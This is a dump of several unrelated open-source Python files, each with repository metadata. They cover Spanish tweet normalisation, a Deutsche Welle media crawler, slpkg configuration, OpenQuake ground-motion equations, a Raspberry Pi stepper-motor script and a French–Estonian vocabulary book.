# Note que esta es una variación, y por lo tanto, se provee
# la correspondiente normalización.
primary_variants = _foma_string_lookup(word, 'primary_variants')
for variant in primary_variants:
s = re.search(r"(.+?)_((?:emo)|(?:inter)|(?:laugh)|(?:norm))$",
variant, re.I|re.U)
if s and s.group(2).lower() != 'emo':
target_words.append(s.group(1))
elif s:
target_words.append('%' + s.group(2))
break
if len(target_words) > 0:
return target_words
elif external_dicc is not None:
original_word = _recover_original_word_case_from_type(word, case_type)
external_suggestions = _foma_string_lookup(
original_word, 'external-dicc', external_dicc)
target_words = external_suggestions
if len(target_words) > 0:
return target_words
# Dictionary lookup
target_words = _transducers_cascade(word, ['dictionary_lookup', 'es-dicc'])
target_words = _filter_target_words_by_length(target_words)
# Buscar si alguna de las palabras candidatas del diccionario
# hace también parte del gazetteer de nombres propios
aux_target_words = []
for candidate in target_words:
aux_target_words += _foma_string_lookup(
_recover_original_word_case_from_type(candidate, 1), 'pnd-gazetteer')
target_words += aux_target_words
if len(target_words) > 0:
return np.unique(target_words).tolist()
# 2. Generación de variantes secundarias:
# (Pre:) Normalización de repetición de caracteres.
# Estas variantes corresponden a palabras que suenan igual a la OOV, y
# pueden ser entradas del diccionario o del gazetteer de PNDs.
# Para identificar PNDs, la OOV se normaliza de repetición de caracteres
# y se realiza conversión grafema/fonema.
target_words = _foma_string_lookup(word, 'secondary_variants-dicc')
target_words += _check_affixes(word, normalised_variants)
target_words = _filter_target_words_by_length(target_words)
target_words += _transducers_cascade(word,
['length_normalisation', 'phonology', 'pnd-gazetteer-fonemas'])
# No se generan variantes de tercer nivel si las generadas en este nivel
# son palabras y/o nombres propios (conformados por al menos una vocal).
# Si son solo nombres propios, una de estas candidatas debe tener un LCSR
# igual o superior a .55
filtering_PNDs = [
_compute_longest_common_subsequence_ratio(word, candidate, True) >= .55
for candidate in target_words]
num_filtered_candidates = sum([1 if v_ else 0 for v_ in filtering_PNDs])
if (len(target_words) > 0
and (not _are_target_words_only_proper_nouns(target_words)
or (not _are_target_words_only_acronyms(target_words)
and num_filtered_candidates > 0))):
target_words += oov_candidates
target_words = np.unique(target_words).tolist()
return _filter_out_acronyms(normalised_variants,
target_words,
max_length)
# 3. Generación de variantes terciarias:
# (Pre:)
# + Normalización de repetición de caracteres.
# + Remover tildes.
# + Inserción de una sola vocal en cualquier posición de la palabra.
# Esto representa a la escritura consonontal.
# NOTA: no se utiliza para la generación de IV-candidates, ni en la
# separación de palabras fusionadas.
# + Agregar tildes.
# Las variantes se generan así:
# 1. Palabras del diccionario estándar o entradas del gazetteer de PNDs
# que están a una distancia de edición de 1 (sustitución, reemplazo
# e inserción).
# 2. Palabras de la lista de IV-candidates que suenan igual.
# 3. Separación de palabras unidas. Esta separación se da fonemas.
target_words += _foma_string_lookup(word, 'tertiary_variants-dicc')
target_words = _filter_target_words_by_length(target_words)
target_words += _transducers_cascade(
_foma_string_lookup(word, 'tertiary_variants-pnd'),
['pnd-gazetteer-case'])
target_words += _transducers_cascade(word,
['length_normalisation', 'phonology', 'iv-candidates-fonemas'])
fused_words = []
if min_length > 3:
LOCK.acquire()
try:
# http://stackoverflow.com/questions/8464391
with Timeout(2):
fused_words = _foma_string_lookup(word, 'split-words')
if len(fused_words) > 0:
fused_words = _select_non_fused_words(fused_words)
except Timeout.Timeout:
fused_words = []
_switch_flookup_server('split-words', mode='on')
LOCK.release()
LCSR = .55
if min_length == 2:
LCSR = .5
target_words = _filter_out_acronyms(normalised_variants,
np.unique(target_words).tolist(),
max_length)
target_words = _filter_target_words_based_on_LCSR(word, target_words, LCSR)
target_words += oov_candidates
return np.unique(target_words).tolist() + np.unique(fused_words).tolist()
def _switch_normalisation_services(mode='on'):
'''Inicia/termina los servicios requeridos por el modelo.'''
_switch_flookup_server(mode=mode)
_switch_freeling_server(mode=mode)
class SpellTweet(object):
'''Analiza el texto del tweet e identifica OOV-words y sugiere correctas.'''
def __init__(self, external_dicc_ip=None, external_dicc_port=None):
"""Instancia un modelo de normalización léxica.
paráms:
external_dicc_ip: str
Dirección IP (v4) del diccionario de normalización dependiente
de contexto. Nótese que tal diccionario es externo. (Véase [1]).
external_dicc_port: str
Puerto por medio de cual se reciben las solicitudes para el di-
ccionario de normalización.
[1] `external_dicc_ip´ y `external_dicc_port´ permiten especificar un
diccionario de normalización dependiente de contexto, es decir, externo.
Tal diccionario corresponde a un transductor de estado finito que reci-
be solicitudes por medio de una instancia de servidor.
"""
self.language_model = kenlm.LanguageModel(CORPORA['eswiki-corpus-3-grams'])
self.external_dicc = None
if external_dicc_ip is not None and external_dicc_port is not None:
self.external_dicc = {
'external-dicc': [None, external_dicc_ip, external_dicc_port],}
def list_oov_words(self, morphological_analysis, include_PND=True):
"""Lista las OOV-words identificadas.
La identificación es dada porque, o bien la palabra no recibió
ningún análisis, o es reconocida como nombre propio (su tag
empieza por NP). Este segundo caso se da porque algunos tweets
son escritos total o parcialmente en mayúscula.
paráms:
include_PND: bool
indica si los PND identificados serán tratados como OOV-words.
Retorna un array con la siguiente estructura:
0 -> sentencia (u oración) en la que aparece.
1 -> posición que ocupa en la sentencia.
2 -> tipo de mayúscula/minúscula:
(véase el método "_get_case_type_in_token")
0 -> completamente en minúscula.
1 -> con la inicial en mayúscula.
2 -> totalmente o con la mayoría de sus letras en mayúscula.
3 -> forma original de la palabra.
4 -> forma en minúsculas de la palabra, decodificada a ASCII
si alguna de sus letras no es reconocida.
5 -> indica si la palabra debe comenzar con mayúscula:
- si es el inicio de una oración
- si va después de un punto seguido,
o signos de interrogación o admiración
- si va después de puntos suspensivos, y la
oov-word empieza con mayúscula
"""
oov_words = []
starts_with_uppercase = False
for i, sentence in enumerate(morphological_analysis):
j, k = 0, 0
for form, lemma, tag in sentence:
if j == 0:
starts_with_uppercase = True
# si el token anterior son puntos suspensivos, y el token actual
# empieza en mayúscula, entonces la forma corregida, si se trata
# de una oov, debe empezar con mayúscula
if (k > 0 and morphological_analysis[i][k-1][2].startswith(u'F')
and re.match(r'\.{3,}$', morphological_analysis[i][k-1][0], re.U)
and form[0].upper() == form[0]):
starts_with_uppercase = True
if lemma == '' and tag == '':
oov_words.append([i, j, _get_case_type_in_token(form),
form, _normalize_unknown_symbols(form).lower(),
starts_with_uppercase])
starts_with_uppercase = False
elif (include_PND and tag.startswith('NP')
and not re.match('(?:#|@)', form, re.U)):
for token in form.split('_'):
# si el token está en minúscula y está en el
# diccionario, descartarlo
if (token.lower() == token and
len(_foma_string_lookup(token, 'es-dicc')) == 1):
j += 1
starts_with_uppercase = False
continue
oov_words.append([i, j, _get_case_type_in_token(token),
token, _normalize_unknown_symbols(token).lower(),
starts_with_uppercase])
j += 1
starts_with_uppercase = False
j -= 1
elif tag.startswith(u'F'):
if tag.lower() in [u'fat', u'fit', u'fp']:
starts_with_uppercase = True
else:
starts_with_uppercase = False
j += 1
k += 1
# Si la oov-word inicia en mayúscula (o inclusive, está completamente en
# mayúscula), y es encontrada en el diccionario, se deja a ella misma.
for i, oov_word in enumerate(oov_words):
if oov_word[2] == 0:
continue
search = _transducers_cascade(
oov_word[3].lower(),
['dictionary_lookup', 'es-dicc'])
if len(search) == 0:
# búsqueda de pronombre enclítico
affixes_search = _check_affixes(
oov_word[3].lower(), [oov_word[3].lower()],
affix='suffix', what_affix='enclitic')
if (oov_word[3].lower() in affixes_search
and len(affixes_search) == 1):
search.append(oov_word[3].lower())
# busqueda de adverbios terminados en -mente
search += _check_affixes(
oov_word[3].lower(), [oov_word[3].lower()],
affix='suffix', what_affix='mente')
search =_filter_target_words_by_length(search)
if (len(search) == 1
and _to_unicode(search[0]).lower() == oov_word[3].lower()):
oov_words[i].append([oov_word[3].lower()])
oov_words[i][2] = 0
if oov_words[i][5]:
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_words[i][6][0], 1)
return oov_words
def select_candidates(self, analysis, oov_words):
'''Selecciona los mejores candidatos.'''
tweet = u''
j = 1
for i, sentence in enumerate(analysis):
for form, lemma, tag in sentence:
if len(tag) == 0:
tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
j += 1
elif tag.startswith(u'NP') and not form.startswith((u'#', u'@')):
for token in form.split('_'):
if (token.lower() == token
and len(_foma_string_lookup(token, 'es-dicc')) == 1):
tweet = tweet + u' ' + token + u' '
else:
tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
j += 1
elif form.startswith((u'#', u'@')) or not tag.startswith(u'F'):
if tag.startswith((u'Z', u'W')):
form = re.sub(
u"""[^a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1_]""", '',
form, flags=re.I|re.U)
if len(form) < 2:
continue
elif not tag.startswith(u'NP'):
form = form.lower()
tweet = tweet + u' ' + form + u' '
tweet = tweet.strip().replace(u' ', u' ').replace(u'jajaja', u'ja')
possible_concatenated_words = False
param_grid = {}
for i, oov_word in enumerate(oov_words):
if len(oov_word[6]) == 1 and oov_word[6][0] != '%EMO':
tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[6][0])
elif len(oov_word[6]) == 1:
tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[3])
oov_words[i][6] = [oov_word[3]]
else:
param_grid['OOV-%i' % (i + 1)] = np.unique(oov_word[-1]).tolist()
if not possible_concatenated_words:
for candidate in param_grid['OOV-%i' % (i + 1)]:
if '_' in candidate:
possible_concatenated_words = True
grid = ParameterGrid(param_grid)
complete_search = True
best_combination = []
max_ppl_value = 1000
for i, combination in enumerate(grid):
if i == 100000:
complete_search = False
break
t = tweet
for oov_id, candidate in combination.iteritems():
t = t.replace('{' + oov_id + '}', candidate.replace('_', ' '))
# si solo se va a normalizar un token, des-
# activar el inicio y fin de la oración
bos = True
eos = True
if len(t.split(' ')) == 1 and not possible_concatenated_words:
bos = False
eos = False
ppl_value = self.language_model.score(t, bos=bos, eos=eos)
if max_ppl_value == 1000 or ppl_value > max_ppl_value:
best_combination = combination
max_ppl_value = ppl_value
else:
for oov, candidate in best_combination.iteritems():
oov_id = int(oov.split('-')[1]) - 1
idx = oov_words[oov_id][6].index(candidate)
oov_words[oov_id][6] = [oov_words[oov_id][6][idx]]
if not complete_search:
for i in xrange(len(oov_words)):
if len(oov_words[i][6]) == 1:
continue
t = tweet
for j in xrange(len(oov_words)):
if i == j:
continue
elif len(oov_words[j][6]) > 1:
t = t.replace('{OOV-%i}' % (j + 1), oov_words[j][3])
ppl_values = np.zeros(len(oov_words[i][6]), dtype=float)
for k, candidate in enumerate(oov_words[i][6]):
ppl_values[k] = self.language_model.score(
t.replace('{OOV-%i}' % (i + 1), candidate))
best_candidate_idx = np.argmax(ppl_values)
oov_words[i][6] = [oov_words[i][6][best_candidate_idx]]
tweet = tweet.replace('{OOV-%i}' % (i + 1), oov_words[i][6][0])
# Mayúsculas: a continuación se identifica la forma correcta de la
# palabra candidata seleccionada, según mayúsculas y minúsculas.
# Las siguientes son las reglas:
# 1. Si la palabra candidata seleccionada empieza por mayúscula (o in-
# clusive, está completamente en mayúscula), así se mantiene.
# 2. Si la palabra candidata seleccionada está en minúscula, no está
# en el diccionario de formas estándar y corresponde a la misma
# oov-word, y no , se recupera las mayúscula según como estaba ori-
# ginalmente.
# 3. Si la palabra candidata seleccionada está en minúscula, y es di-
# ferente de la oov-word, se recuperará su mayúscula si está
# al inicio de la oración, después de un punto seguido o signos de
# puntación o interrogación.
# Aplicación de la reglas
# (Note que la primera no es necesario implementarla)
for i, oov_word in enumerate(oov_words):
if (oov_word[3].lower() == oov_word[6][0]):
if len(_foma_string_lookup(oov_word[6][0], 'es-dicc')) == 0:
# segunda regla
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], oov_word[2])
elif oov_word[5]:
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], 1)
elif (oov_word[3].lower() != oov_word[6][0]
and oov_word[6][0].lower() == oov_word[6][0]
and oov_word[5]):
# tercera regla
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], 1)
return oov_words
def spell_tweet(self, text):
'''Analiza léxicamente un tweet y lo corrige, si es necesario.
paráms:
text: str
Texto del tweet.
only_suggest_candidates: bool
Si es verdadero, sólo retorna las candidatas por cada OOV
identificada.
salida:
candidatas_seleccionadas: list
Arreglo con las oov-words identificadas y las candidatas
seleccionadas. Un arrego por cada OOV, siendo la estruc-
tura la siguiente:
0, sentencia (u oración) en la que aparece.
1, posición que ocupa en la sentencia.
2, forma original de la palabra.
3, candidata seleccionada.
4, candidatas sugeridas.
'''
if text=='':
raise Exception('Debe especificar un texto a normalizar')
else:
text = _to_unicode(text)
analysis = _analyze_morphologically(text)
oov_words = self.list_oov_words(analysis)
# por cada palabra fuera de vocabulario, proponer candidatas
pool = multiprocessing.Pool(processes=4)
candidates = [
[i, pool.apply_async(_suggest_target_words, [oov_word[4], oov_word[2], self.external_dicc])]
for i, oov_word in enumerate(oov_words) if len(oov_word) == 6]
pool.close()
pool.join()
normalisation_candidates = {}
for i, target_words in candidates:
try:
oov_words[i].append(target_words.get(timeout=3))
except (ValueError, multiprocessing.TimeoutError):
oov_words[i].append(
np.unique([
oov_words[i][3],
oov_words[i][4],
_recover_original_word_case_from_type(
oov_words[i][4], oov_words[i][2])
]).tolist())
_switch_flookup_server(mode='on')
normalisation_candidates[i] = oov_words[i][6]
oov_words = self.select_candidates(analysis, oov_words)
for i, oov in enumerate(oov_words):
if i not in normalisation_candidates.keys():
normalisation_candidates[i] = []
oov_words[i] = [oov[0], oov[1], oov[3], oov[6][0],
np.unique(normalisation_candidates[i] + oov[6]).tolist()]
return oov_words
| mit | -1,392,678,479,065,251,600 | 38.590456 | 104 | 0.561087 | false | 3.379849 | false | false | false |
EUMSSI/EUMSSI-platform | crawlers/DW-import/DW-api-video-crawler.py | 1 | 3632 | #!/usr/bin/env python
import uuid
import ConfigParser
import pymongo
import json
import requests
import sys, os
from os.path import isdir, join
import urllib2
from bs4 import BeautifulSoup
class ItemWriter:
def __init__(self, source, meta_format):
self.mongo_client = pymongo.MongoClient()
self.db = self.mongo_client['eumssi_db']
self.col = self.db['content_items']
self.source = source
self.format = meta_format
def write_item(self, item):
''' write item to MongoDB '''
try:
twuid = uuid.uuid4()
print "inserted: ", self.col.insert({'_id':uuid.uuid4(),'source':self.source,'meta':{'original':item, 'original_format':self.format},'processing':{'queues':{'metadata':'pending'}}})
except Exception as e:
print e
def find_item(self, item):
try:
cursor = self.col.find({'meta.original.reference.id': item['reference']['id']})
for i in cursor:
return "1"
except Exception as e:
print "exception: " , e
return None
def get_number_of_page(code):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=1"
geninf = json.loads(urllib2.urlopen(host).read())
return geninf['paginationInfo']['availablePages']
def getFullText(url):
r = urllib2.urlopen(url)
httpcont = r.read()
soup = BeautifulSoup(httpcont, 'html.parser')
intro = soup.findAll('p', {'class': 'intro'})
text = soup.findAll('div', {'class': 'longText'})
result = ""
if len(intro)>0:
result += intro[0].text
if len(text)>0:
result += text[0].text
return result
'''
Extract items and insert to DB
'''
def fetch_data(language, duplicatecheck):
''' default values '''
code = 2
if language == 'es':
code = 28
if language == 'de':
code = 1
if language == 'fr':
code = 13
number_of_page = get_number_of_page(code)
if number_of_page is None:
return
icounter = 0
for i in range(1, number_of_page+1):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=" + str(i)
try:
itemset = json.loads(urllib2.urlopen(host).read())
#write data to mongo db
writer_video = ItemWriter('DW video','DW-MediaCenter-api')
writer_audio = ItemWriter('DW audio','DW-MediaCenter-api')
for item in itemset['items']:
tmp = None
if duplicatecheck=='1':
tmp = writer.find_item(item)
if tmp is None:
item['language'] = language
icounter+=1
itemdetail = json.loads(urllib2.urlopen(item['reference']['url']).read())
item['details'] = itemdetail
item['text'] = getFullText(itemdetail['permaLink'])
if len(item['text'])<100: #exceptional case
item['text'] = item['teaserText']
if 'type' in item:
if item['type']=='AudioTeaser':
writer_audio.write_item(item)
else:
if item['type']=='VideoTeaser':
writer_video.write_item(item)
else:
print 'item ', item['reference']['id'], 'exists in db already!'
except Exception as e:
print host
print e
if __name__ == '__main__':
print '!-----------------------------------------------------'
print '!@usage: python [me] language duplicatecheck\n!\t--language: en,es,fr,de\n!\t--duplicatecheck:1 (check),0 (no check)'
print '!-----------------------------------------------------'
language = sys.argv[1]
duplicatecheck = sys.argv[2]
print 'Now fetching data for ', language, ' with the duplicate check option: ', duplicatecheck
fetch_data(language, duplicatecheck)
| apache-2.0 | -4,000,235,398,634,655,000 | 30.042735 | 187 | 0.591685 | false | 3.606753 | false | false | false |
BrentonEarl/slpkg | slpkg/config.py | 1 | 3003 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# config.py file is part of slpkg.
# Copyright 2014-2015 Dimitris Zlatanidis <[email protected]>
# All rights reserved.
# Slpkg is a user-friendly package manager for Slackware installations
# https://github.com/dslackw/slpkg
# Slpkg is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import shutil
import filecmp
import subprocess
from slpkg.utils import Utils
from slpkg.__metadata__ import MetaData as _meta_
class Config(object):
"""Print or edit slpkg configuration file
"""
def __init__(self):
self.config_file = "/etc/slpkg/slpkg.conf"
self.meta = _meta_
def view(self):
"""View slpkg config file
"""
print("") # new line at start
conf_args = [
"RELEASE",
"BUILD_PATH",
"PACKAGES",
"PATCHES",
"CHECKMD5",
"DEL_ALL",
"DEL_BUILD",
"SBO_BUILD_LOG",
"MAKEFLAGS",
"DEFAULT_ANSWER",
"REMOVE_DEPS_ANSWER",
"SKIP_UNST",
"RSL_DEPS",
"DEL_DEPS",
"USE_COLORS",
"DOWNDER",
"DOWNDER_OPTIONS",
"SLACKPKG_LOG",
"ONLY_INSTALLED",
"PRG_BAR",
"EDITOR"
]
read_conf = Utils().read_file(self.config_file)
for line in read_conf.splitlines():
if not line.startswith("#") and line.split("=")[0] in conf_args:
print("{0}".format(line))
else:
print("{0}{1}{2}".format(self.meta.color["CYAN"], line,
self.meta.color["ENDC"]))
print("") # new line at end
def edit(self):
"""Edit configuration file
"""
subprocess.call("{0} {1}".format(self.meta.editor,
self.config_file), shell=True)
def reset(self):
"""Reset slpkg.conf file with default values
"""
shutil.copy2(self.config_file + ".orig", self.config_file)
if filecmp.cmp(self.config_file + ".orig", self.config_file):
print("{0}The reset was done{1}".format(
self.meta.color["GREEN"], self.meta.color["ENDC"]))
else:
print("{0}Reset failed{1}".format(self.meta.color["RED"],
self.meta.color["ENDC"]))
| gpl-3.0 | 2,471,797,473,529,711,600 | 32 | 76 | 0.559108 | false | 3.930628 | true | false | false |
gem/oq-hazardlib | openquake/hazardlib/gsim/boore_1993.py | 1 | 7260 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2017 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module exports :class:`BooreEtAl1993GSCBest`,
:class:`BooreEtAl1993GSCUpperLimit`, :class:`BooreEtAl1993GSCLowerLimit`.
"""
from __future__ import division
import numpy as np
from scipy.constants import g
from openquake.hazardlib.gsim.base import GMPE, CoeffsTable
from openquake.hazardlib import const
from openquake.hazardlib.imt import PGA, SA
class BooreEtAl1993GSCBest(GMPE):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Best' case (that is mean unaffected)
"""
#: Supported tectonic region type is active shallow crust, given
#: that the equations have been derived for Western North America
DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST
#: Supported intensity measure types are spectral acceleration,
#: and peak ground acceleration
DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
PGA,
SA
])
#: Supported intensity measure component is random horizontal
#: :attr:`~openquake.hazardlib.const.IMC.RANDOM_HORIZONTAL`,
DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.RANDOM_HORIZONTAL
#: Supported standard deviation type is total
DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
const.StdDev.TOTAL
])
#: site params are not required
REQUIRES_SITES_PARAMETERS = set()
#: Required rupture parameter is magnitude
REQUIRES_RUPTURE_PARAMETERS = set(('mag', ))
#: Required distance measure is Rjb distance
#: see paragraph 'Predictor Variables', page 6.
REQUIRES_DISTANCES = set(('rjb', ))
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
C = self.COEFFS[imt]
mag = rup.mag - 6
d = np.sqrt(dists.rjb ** 2 + C['c7'] ** 2)
mean = np.zeros_like(d)
mean += C['c1'] + C['c2'] * mag + C['c3'] * mag ** 2 + C['c6']
idx = d <= 100.
mean[idx] = mean[idx] + C['c5'] * np.log10(d[idx])
idx = d > 100.
mean[idx] = (mean[idx] + C['c5'] * np.log10(100.) -
np.log10(d[idx] / 100.) + C['c4'] * (d[idx] - 100.))
# convert from log10 to ln and from cm/s**2 to g
mean = np.log((10.0 ** (mean - 2.0)) / g)
stddevs = self._get_stddevs(C, stddev_types, dists.rjb.shape[0])
return mean, stddevs
def _get_stddevs(self, C, stddev_types, num_sites):
"""
Return total standard deviation.
"""
assert all(stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
for stddev_type in stddev_types)
stddevs = [np.zeros(num_sites) + C['sigma'] for _ in stddev_types]
return stddevs
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 2.887 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.451 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.464 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 3.295 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 2.980 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.522 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 2.234 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
class BooreEtAl1993GSCUpperLimit(BooreEtAl1993GSCBest):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Upper Limit' case (that is mean value + 0.7 nat
log)
"""
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 3.187 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.751 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.764 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 3.595 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 3.280 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.822 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 2.534 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
class BooreEtAl1993GSCLowerLimit(BooreEtAl1993GSCBest):
"""
Implement equation used by the Geological Survey of Canada (GSC) for
the 2010 Western Canada National Seismic Hazard Model. The class implements
the model of David M. Boore, William B. Joyner, and Thomas E. Fumal
("Estimation of Response Spectra and Peak Accelerations from Western North
American Earthquakes: An Interim Report", 1993, U.S. Geological Survey,
Open File Report 93-509).
Equation coefficients provided by GSC for the random horizontal component
and corresponding to the 'Lower Limit' case (that is mean value - 0.7 nat
log)
"""
#: coefficient table provided by GSC
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c2 c3 c4 c5 c6 c7 sigma
pga 2.587 0.229 0.0 -0.00326 -0.778 0.162 5.57 0.529
0.1 3.151 0.327 -0.098 -0.00395 -0.934 0.046 6.27 0.479
0.2 3.164 0.309 -0.090 -0.00259 -0.924 0.190 7.02 0.495
0.3 2.995 0.334 -0.070 -0.00202 -0.893 0.239 5.94 0.520
0.5 2.680 0.384 -0.039 -0.00148 -0.846 0.279 4.13 0.562
1.0 2.222 0.450 -0.014 -0.00097 -0.798 0.314 2.90 0.622
2.0 1.934 0.471 -0.037 -0.00064 -0.812 0.360 5.85 0.675
""")
| agpl-3.0 | -6,444,127,054,750,756,000 | 40.965318 | 79 | 0.637741 | false | 2.854896 | false | false | false |
kscottz/SkinnerBox | util/stepper.py | 1 | 1710 | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
enable_pin = 27 #18
coil_A_2_pin = 18 #23 #17
coil_A_1_pin = 23 #18 #4
coil_B_1_pin = 25 #23
coil_B_2_pin = 24 #24
GPIO.setup(enable_pin, GPIO.OUT)
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
GPIO.output(enable_pin, 1)
def forward(delay, steps):
for i in range(0, steps):
# setStep(1,0,1,0)
# time.sleep(delay)
# setStep(1, 0, 1, 1)
# time.sleep(delay)
# setStep(1, 0, 0, 1)
# time.sleep(delay)
# setStep(1, 1, 0, 1)
# time.sleep(delay)
# setStep(0, 1, 0, 1)
# time.sleep(delay)
# setStep(0, 1, 1, 1)
# time.sleep(delay)
# setStep(0, 1, 1, 0)
# time.sleep(delay)
# setStep(1, 1, 1, 0)
# time.sleep(delay)
setStep(1, 0, 1, 0)
time.sleep(delay)
setStep(0, 1, 1, 0)
time.sleep(delay)
setStep(0, 1, 0, 1)
time.sleep(delay)
setStep(1, 0, 0, 1)
time.sleep(delay)
def backwards(delay, steps):
for i in range(0, steps):
setStep(1, 0, 0, 1)
time.sleep(delay)
setStep(0, 1, 0, 1)
time.sleep(delay)
setStep(0, 1, 1, 0)
time.sleep(delay)
setStep(1, 0, 1, 0)
time.sleep(delay)
def setStep(w1, w2, w3, w4):
GPIO.output(coil_A_1_pin, w1)
GPIO.output(coil_A_2_pin, w2)
GPIO.output(coil_B_1_pin, w3)
GPIO.output(coil_B_2_pin, w4)
while True:
#setStep(1,1,1,1)
delay = raw_input("Delay between steps (milliseconds)?")
steps = raw_input("How many steps forward? ")
forward(int(delay) / 1000.0, int(steps))
steps = raw_input("How many steps backwards? ")
backwards(int(delay) / 1000.0, int(steps))
| mit | -9,137,084,050,979,697,000 | 22.75 | 58 | 0.59883 | false | 2.358621 | false | false | false |
MaxTyutyunnikov/lino | lino/modlib/vocbook/fr4et.py | 1 | 64556 | # -*- coding: UTF-8 -*-
## Copyright 2011-2013 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import os
import sys
from lino.modlib.vocbook.fr import French, Autre, Nom, NomPropre, Adjectif, Numerique, Verbe, NomGeographique
from lino.modlib.vocbook.et import Estonian
from lino.modlib.vocbook.base import Book, FR, M, F, ET, PRON, GEON, GEOM, GEOF
if __name__ == '__main__':
if len(sys.argv) != 3:
raise Exception("""
Usage : %(cmd)s rst OUTPUT_ROOT_DIR
%(cmd)s odt OUTPUT_FILE
""" % dict(cmd=sys.argv[0]))
output_format = sys.argv[1]
else:
output_format = 'rst' #
if output_format == "rst":
FULL_CONTENT = True
else:
FULL_CONTENT = False
HAS_FUN = True
HAS_EXERCICES = False
book = Book(French,Estonian,
title="Kutsealane prantsuse keel kokkadele",
input_template=os.path.join(os.path.dirname(__file__),'Default.odt'))
#~ os.path.join(os.path.dirname(__file__),'cfr.odt')
Pronounciation = book.add_section(u"Hääldamine",intro=u"""
Esimeses osas keskendume hääldamisele.
Siin pole vaja meelde jätta näidissõnu,
vaid et sa oskaksid neid ette lugeda õigesti hääldades.
""")
Intro = Pronounciation.add_section("Sissejuhatus",intro="""
""")
Eestlastele = Pronounciation.add_section("Eestlastele",intro="""
""")
Pronounciation.add_lesson(u"Hääldamisreeglite spikker", intro=u"""
Hääldamisreeglid:
[ruleslist
ai
ail
ain
an
au
c
cedille
ch
eau
eil
ein
en
ent
er
et
eu
euil
